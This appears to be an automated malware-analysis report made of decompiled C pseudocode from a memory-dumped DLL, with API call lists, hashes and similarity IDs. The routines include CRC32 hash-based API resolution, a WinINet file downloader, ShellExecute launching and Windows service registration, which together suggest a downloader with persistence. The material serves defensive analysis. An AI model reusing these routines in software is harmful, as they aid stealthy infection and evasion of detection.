                                                                                                                        				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
                                                                                                                        				_v11 = 0;
                                                                                                                        				_v15 = 0x73;
                                                                                                                        				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24);
                                                                                                                        				_t26 = _a16;
                                                                                                                        				_v15 = 0x74;
                                                                                                                        				_t27 = _t26 & 0x000000ff;
                                                                                                                        				if(_t26 == 0) {
                                                                                                                        					_t27 = 0xc;
                                                                                                                        				}
                                                                                                                        				wsprintfA( &_v12, "%d", _t27);
                                                                                                                        				_t39 = M6F3404CC; // 0x99d818
                                                                                                                        				_t30 = M6F3404DC; // 0x99b1c8
                                                                                                                        				return WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39);
                                                                                                                        			}






















                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F3369EA
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,0099D818,?,0099D818), ref: 6F336A0D
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336A45
                                                                                                                        • wsprintfA.USER32 ref: 6F336A69
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                                        • String ID: hdn$s$t
                                                                                                                        • API String ID: 2965074233-1328931711
                                                                                                                        • Opcode ID: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction ID: 9e41e9caa8fadecac9bba49ffb96c8628ed8ed4e22ab71a04489e46710e73c76
                                                                                                                        • Opcode Fuzzy Hash: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction Fuzzy Hash: C62183B22186929FD700DF58C844E6BB7EDEFD5214F058A0CF49493241D674AA1CCBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F338230(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                        				long _t4;
                                                                                                                        				WCHAR* _t11;
                                                                                                                        				WCHAR* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        
                                                                                                                        				_t12 = _a4;
                                                                                                                        				_t11 = _a8;
                                                                                                                        				if(_t12 == 0 || _t11 == 0) {
                                                                                                                        					L7:
                                                                                                                        					_push(_t11);
                                                                                                                        					_push(_t12);
                                                                                                                        					M6F3405F8();
                                                                                                                        					return _t4;
                                                                                                                        				} else {
                                                                                                                        					_t4 = GetFileAttributesW(_t12);
                                                                                                                        					if((_t4 & 0xffffffef) == 0) {
                                                                                                                        						goto L7;
                                                                                                                        					} else {
                                                                                                                        						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
                                                                                                                        						if(_t4 != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							SetLastError(_t4);
                                                                                                                        							_t13 = E6F33A2F0(_t12, 0, 0);
                                                                                                                        							if(_t13 != 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(1);
                                                                                                                        								E6F334230("open", _t13, 0);
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t13);
                                                                                                                        							}
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F338243
                                                                                                                        • PathFindFileNameW.SHLWAPI(?,run), ref: 6F338256
                                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 6F33825D
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6F338268
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                          • Part of subcall function 6F334230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                          • Part of subcall function 6F334230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                          • Part of subcall function 6F334230: WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                          • Part of subcall function 6F334230: GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                          • Part of subcall function 6F334230: CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33829A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3382A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
                                                                                                                        • String ID: open$run
                                                                                                                        • API String ID: 2941314601-2128457515
                                                                                                                        • Opcode ID: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction ID: eafe0a8456b46b7470652278ffb60c0f41678d4b5b7510c2a5e2062331bb59c3
                                                                                                                        • Opcode Fuzzy Hash: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction Fuzzy Hash: EB01DB37E49FB47BDA30E6749D09FCB362DAF92B31F010009FD55E6080DB69D41246A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F331DB0() {
                                                                                                                        				short _t58;
                                                                                                                        				signed int _t60;
                                                                                                                        				signed int _t61;
                                                                                                                        				signed int _t63;
                                                                                                                        				signed int _t72;
                                                                                                                        				signed int _t73;
                                                                                                                        				intOrPtr _t77;
                                                                                                                        				signed int _t78;
                                                                                                                        				CHAR* _t80;
                                                                                                                        				signed int _t83;
                                                                                                                        				signed int _t89;
                                                                                                                        				intOrPtr* _t90;
                                                                                                                        				char* _t96;
                                                                                                                        				intOrPtr* _t101;
                                                                                                                        				char* _t103;
                                                                                                                        				CHAR* _t106;
                                                                                                                        				char* _t108;
                                                                                                                        				CHAR* _t109;
                                                                                                                        				short _t112;
                                                                                                                        				struct HINSTANCE__* _t115;
                                                                                                                        				void* _t116;
                                                                                                                        
                                                                                                                        				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
                                                                                                                        				_t58 = 1;
                                                                                                                        				 *(_t116 + 0x14) = 1;
                                                                                                                        				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
                                                                                                                        					L28:
                                                                                                                        					return _t58;
                                                                                                                        				} else {
                                                                                                                        					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
                                                                                                                        					 *(_t116 + 0x24) = _t83;
                                                                                                                        					if( *_t83 != 0x4550) {
                                                                                                                        						goto L28;
                                                                                                                        					}
                                                                                                                        					_t77 =  *((intOrPtr*)(_t83 + 0x78));
                                                                                                                        					_t78 = _t77 + _t101;
                                                                                                                        					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
                                                                                                                        					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
                                                                                                                        					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
                                                                                                                        					 *(_t116 + 0x14) = _t78;
                                                                                                                        					 *(_t116 + 0x1c) = _t89;
                                                                                                                        					 *(_t116 + 0xc) = 0;
                                                                                                                        					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
                                                                                                                        						L27:
                                                                                                                        						return _t58;
                                                                                                                        					}
                                                                                                                        					while(1) {
                                                                                                                        						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
                                                                                                                        						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
                                                                                                                        						_t96 =  *(_t116 + 0x50);
                                                                                                                        						_t61 = _t60 ^  *(_t116 + 0x54);
                                                                                                                        						_t112 = 0;
                                                                                                                        						if(_t96 <= 0) {
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
                                                                                                                        						while(_t61 !=  *_t90) {
                                                                                                                        							_t112 = _t112 + 1;
                                                                                                                        							_t90 = _t90 + 0x10;
                                                                                                                        							if(_t112 < _t96) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
                                                                                                                        						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
                                                                                                                        							L22:
                                                                                                                        							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
                                                                                                                        							_t101 =  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        							if(_t103 == 0) {
                                                                                                                        								 *(_t116 + 0x20) = 0;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t80 = StrDupA(_t103);
                                                                                                                        							if(_t80 == 0) {
                                                                                                                        								L24:
                                                                                                                        								_t78 =  *(_t116 + 0x1c);
                                                                                                                        								_t101 =  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        								goto L25;
                                                                                                                        							}
                                                                                                                        							 *(_t116 + 0x20) = 0;
                                                                                                                        							_t108 = StrChrA(_t80, 0x2e);
                                                                                                                        							if(_t108 == 0) {
                                                                                                                        								L20:
                                                                                                                        								LocalFree(_t80);
                                                                                                                        								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
                                                                                                                        									goto L24;
                                                                                                                        								}
                                                                                                                        								_t78 =  *(_t116 + 0x1c);
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							 *_t108 = 0;
                                                                                                                        							_t109 = _t108 + 1;
                                                                                                                        							_t115 = GetModuleHandleA(_t80);
                                                                                                                        							if(_t115 != 0) {
                                                                                                                        								L18:
                                                                                                                        								 *(_t116 + 0x1c) = 1;
                                                                                                                        								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
                                                                                                                        								_t73 =  *(_t116 + 0x54);
                                                                                                                        								_push(_t73);
                                                                                                                        								_push(0x10);
                                                                                                                        								_push(_t116 + 0x3c);
                                                                                                                        								_push(_t115);
                                                                                                                        								 *(_t116 + 0x44) = _t72 ^ _t73;
                                                                                                                        								 *((intOrPtr*)(_t116 + 0x48)) = 0;
                                                                                                                        								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
                                                                                                                        								 *(_t116 + 0x50) = 0;
                                                                                                                        								E6F331DB0();
                                                                                                                        								_t103 =  *(_t116 + 0x50);
                                                                                                                        								_t116 = _t116 + 0x10;
                                                                                                                        								L19:
                                                                                                                        								_t112 =  *((intOrPtr*)(_t116 + 0x10));
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        							_t115 = LoadLibraryA(_t80);
                                                                                                                        							if(_t115 == 0) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        						L25:
                                                                                                                        						_t63 =  *(_t116 + 0x14) + 1;
                                                                                                                        						 *(_t116 + 0x14) = _t63;
                                                                                                                        						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
                                                                                                                        							_t89 =  *(_t116 + 0x24);
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						_t58 =  *(_t116 + 0x20);
                                                                                                                        						goto L27;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
























                                                                                                                        0x6f331f2e
                                                                                                                        0x6f331f33
                                                                                                                        0x6f331f37
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331f3a
                                                                                                                        0x00000000
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331eee
                                                                                                                        0x6f331ef2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331ef2
                                                                                                                        0x6f331f74
                                                                                                                        0x6f331f78
                                                                                                                        0x6f331f79
                                                                                                                        0x6f331f80
                                                                                                                        0x6f331e30
                                                                                                                        0x00000000
                                                                                                                        0x6f331e30
                                                                                                                        0x6f331f86
                                                                                                                        0x00000000
                                                                                                                        0x6f331f8b
                                                                                                                        0x6f331e34

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        • StrDupA.SHLWAPI(?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EAF
                                                                                                                        • StrChrA.SHLWAPI(00000000,0000002E,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331ECA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EDB
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EE8
                                                                                                                        • lstrlenA.KERNEL32(00000001,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EFD
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6F331F08
                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331F3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1770823755-0
                                                                                                                        • Opcode ID: a4d52f565ab13f5d7d2580e04ba3fbea70522657c8231f4cbba226d27ef2e0ad
                                                                                                                        • Instruction ID: 65e8725b82402b4f01efe4d29028d19829b0407ec8df8c8736d513323c304720
                                                                                                                        • Opcode Fuzzy Hash: a4d52f565ab13f5d7d2580e04ba3fbea70522657c8231f4cbba226d27ef2e0ad
                                                                                                                        • Instruction Fuzzy Hash: 4E5157729083958FC710EF58C880A5BB7FABF89708F044A1DF99597341D7B2E8158BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F333180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				signed int _t21;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t21 = 0;
                                                                                                                        				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        				if(_t22 != 0) {
                                                                                                                        					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
                                                                                                                        					asm("bswap edi");
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t22);
                                                                                                                        				}
                                                                                                                        				return _t21;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F333192
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333195
                                                                                                                        • wsprintfA.USER32 ref: 6F3331B8
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F3331C4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6F3331D9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3331DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocComputeCrc32Freewsprintf
                                                                                                                        • String ID: %s%s%s%c
                                                                                                                        • API String ID: 3834306679-489954935
                                                                                                                        • Opcode ID: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction ID: ae3b06c34e2ca5a5d7f77b5956ace44fa511404ae0d515e7e5a597a12bec6c51
                                                                                                                        • Opcode Fuzzy Hash: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction Fuzzy Hash: DCF090B7B416A42BE624D6258C8DE7B769EEFC9661F008118FA18D7280CA64DC1286B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335A00() {
                                                                                                                        				char* _v16;
                                                                                                                        				CHAR* _v36;
                                                                                                                        				void* _v1048;
                                                                                                                        				void _v1068;
                                                                                                                        				long _v1076;
                                                                                                                        				long _v1080;
                                                                                                                        				void _v1084;
                                                                                                                        				void* _v1088;
                                                                                                                        				long _v1092;
                                                                                                                        				long _v1096;
                                                                                                                        				char* _t13;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t27;
                                                                                                                        				long _t33;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t38;
                                                                                                                        
                                                                                                                        				_t13 = M6F340518; // 0x749bb0
                                                                                                                        				_t33 = 0;
                                                                                                                        				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
                                                                                                                        				_v1048 = _t38;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                        						if(_t36 != 0xffffffff) {
                                                                                                                        							_v1080 = 0;
                                                                                                                        							_v1076 = 0;
                                                                                                                        							do {
                                                                                                                        								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
                                                                                                                        									goto L7;
                                                                                                                        								} else {
                                                                                                                        									_t23 = _v1096;
                                                                                                                        									if(_t23 != 0) {
                                                                                                                        										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
                                                                                                                        										goto L7;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								break;
                                                                                                                        								L7:
                                                                                                                        							} while (_v1096 > 0);
                                                                                                                        							_t33 = 1;
                                                                                                                        							CloseHandle(_t36);
                                                                                                                        							_t38 = _v1088;
                                                                                                                        						}
                                                                                                                        						InternetCloseHandle(_t27);
                                                                                                                        					}
                                                                                                                        					InternetCloseHandle(_t38);
                                                                                                                        				}
                                                                                                                        				return _t33;
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000000,00000000,00000000,00000000), ref: 6F335A14
                                                                                                                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6F335A3A
                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6F335A62
                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6F335A93
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F335AAF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335ABE
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AC9
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2705228764-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F333B60(intOrPtr* _a8) {
                                                                                                                        				struct _SERVICE_STATUS* _v4;
                                                                                                                        				int _v8;
                                                                                                                        				CHAR* _t9;
                                                                                                                        				int _t10;
                                                                                                                        				void* _t13;
                                                                                                                        				int _t14;
                                                                                                                        				signed int _t18;
                                                                                                                        				short* _t20;
                                                                                                                        				int _t21;
                                                                                                                        				void _t22;
                                                                                                                        				void* _t23;
                                                                                                                        				void* _t26;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        				void* _t30;
                                                                                                                        
                                                                                                                        				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        				_t10 = SetCurrentDirectoryA(_t9);
                                                                                                                        				_t27 = _a8;
                                                                                                                        				 *0x6f34043c = 0x20;
                                                                                                                        				 *0x6f340440 = 2;
                                                                                                                        				 *0x6f340444 = 0x85;
                                                                                                                        				 *0x6f340448 = 0;
                                                                                                                        				 *0x6f34044c = 0;
                                                                                                                        				 *0x6f340450 = 0;
                                                                                                                        				 *0x6f340454 = 0;
                                                                                                                        				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6F333A70, 0, _t23, _t26);
                                                                                                                        				 *0x6f340394 = _t10;
                                                                                                                        				if(_t10 == 0) {
                                                                                                                        					 *0x6f340440 = 1;
                                                                                                                        					SetServiceStatus(0, 0x6f34043c);
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				_t21 = _v8;
                                                                                                                        				 *0x6f340440 = 4;
                                                                                                                        				_t30 = _t21 - 1;
                                                                                                                        				if(_t30 <= 0) {
                                                                                                                        					L7:
                                                                                                                        					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                        					if(_t13 != 0) {
                                                                                                                        						_t22 = M6F3404E8; // 0x1
                                                                                                                        						 *_t13 = _t22;
                                                                                                                        						CloseHandle(CreateThread(0, 0, E6F333930, _t13, 0, 0));
                                                                                                                        					}
                                                                                                                        					L9:
                                                                                                                        					_v4 = 0x6f34043c;
                                                                                                                        					_t14 =  *0x6f340394; // 0x0
                                                                                                                        					_v8 = _t14;
                                                                                                                        					return SetServiceStatus(??, ??);
                                                                                                                        				}
                                                                                                                        				_t18 = 1;
                                                                                                                        				if(_t30 <= 0) {
                                                                                                                        					goto L7;
                                                                                                                        				} else {
                                                                                                                        					while(1) {
                                                                                                                        						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
                                                                                                                        						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        						_t18 = _t18 + 1;
                                                                                                                        						if(_t18 < _t21) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						goto L7;
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(009953A0), ref: 6F333B68
                                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,6F333A70,00000000), ref: 6F333BB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,6F333A70,00000000), ref: 6F333BF8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333BFF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333C1B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333C22
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C,?,6F333A70,00000000), ref: 6F333C51
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F333C58
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2085172483-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F331720(void* __edi) {
                                                                                                                        				struct HINSTANCE__* _v4;
                                                                                                                        				intOrPtr* _v8;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				struct HINSTANCE__* _t44;
                                                                                                                        				signed int _t46;
                                                                                                                        				intOrPtr _t47;
                                                                                                                        				signed short _t48;
                                                                                                                        				CHAR* _t49;
                                                                                                                        				_Unknown_base(*)()* _t51;
                                                                                                                        				signed int _t53;
                                                                                                                        				signed int _t54;
                                                                                                                        				signed int _t55;
                                                                                                                        				signed int _t59;
                                                                                                                        				void* _t60;
                                                                                                                        				intOrPtr* _t67;
                                                                                                                        				signed short* _t70;
                                                                                                                        				intOrPtr _t75;
                                                                                                                        				intOrPtr* _t78;
